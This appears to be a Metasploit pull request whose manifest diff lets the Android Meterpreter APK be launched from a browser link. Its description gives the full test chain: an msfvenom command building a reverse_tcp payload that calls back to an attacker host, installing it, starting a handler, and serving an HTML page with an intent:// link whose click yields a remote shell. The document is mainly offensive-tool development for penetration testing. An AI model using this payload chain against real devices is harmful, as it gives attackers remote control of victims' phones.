### PR TITLE
Allow Android Meterpreter to be launched from a browser

### DIFF
--- a/java/androidpayload/app/AndroidManifest.xml
+++ b/java/androidpayload/app/AndroidManifest.xml
@@ -33,8 +33,13 @@
             android:label="@string/app_name" >
             <intent-filter>
                 <action android:name="android.intent.action.MAIN" />
-
                 <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+            <intent-filter>
+                <data android:scheme="metasploit" android:host="my_host" />
+                <category android:name="android.intent.category.DEFAULT" />
+                <category android:name="android.intent.category.BROWSABLE" />
+                <action android:name="android.intent.action.VIEW" />
             </intent-filter>
         </activity>
     </application>


### PR DESCRIPTION
This allows you to launch the android meterpreter apk on your device with a browser.

For testing, please do:

- [ ] ```./msfvenom -p android/meterpreter/reverse_tcp lhost=IP lport=4444 -o /tmp/android.apk```
- [ ] Start your android emulator
- [ ] Install the apk: ```./install_msf_apk /tmp/android.apk``` (The install_msf_apk script is already in your metasploit/tools directory)
- [ ] Start msfconsole, and start a handler for android/meterpreter/reverse_tcp (if you get a connection, exit, and restart the handler)
- [ ] On the android emulator, make sure the android meterpreter isn't running. Basically go to Settings -> Apps -> click on MainActivity. If you see the Force Stop button clickable, click it.
- [ ] Save the following HTML as /tmp/test.html:

```html
<html>
<a href="intent://my_host#Intent;scheme=metasploit;action=android.intent.action.VIEW;end">Link to my stuff</a> 
</html>
```

- [ ] Start a ruby webserver under that tmp directory: ```ruby -run -e httpd . -p 8181```
- [ ] On the emulator, open the browser, and then enter the URL for test.html. You should see the webpage with the link that says "Link to my stuff"
- [ ] When you click on that link, msfconsole should get a shell.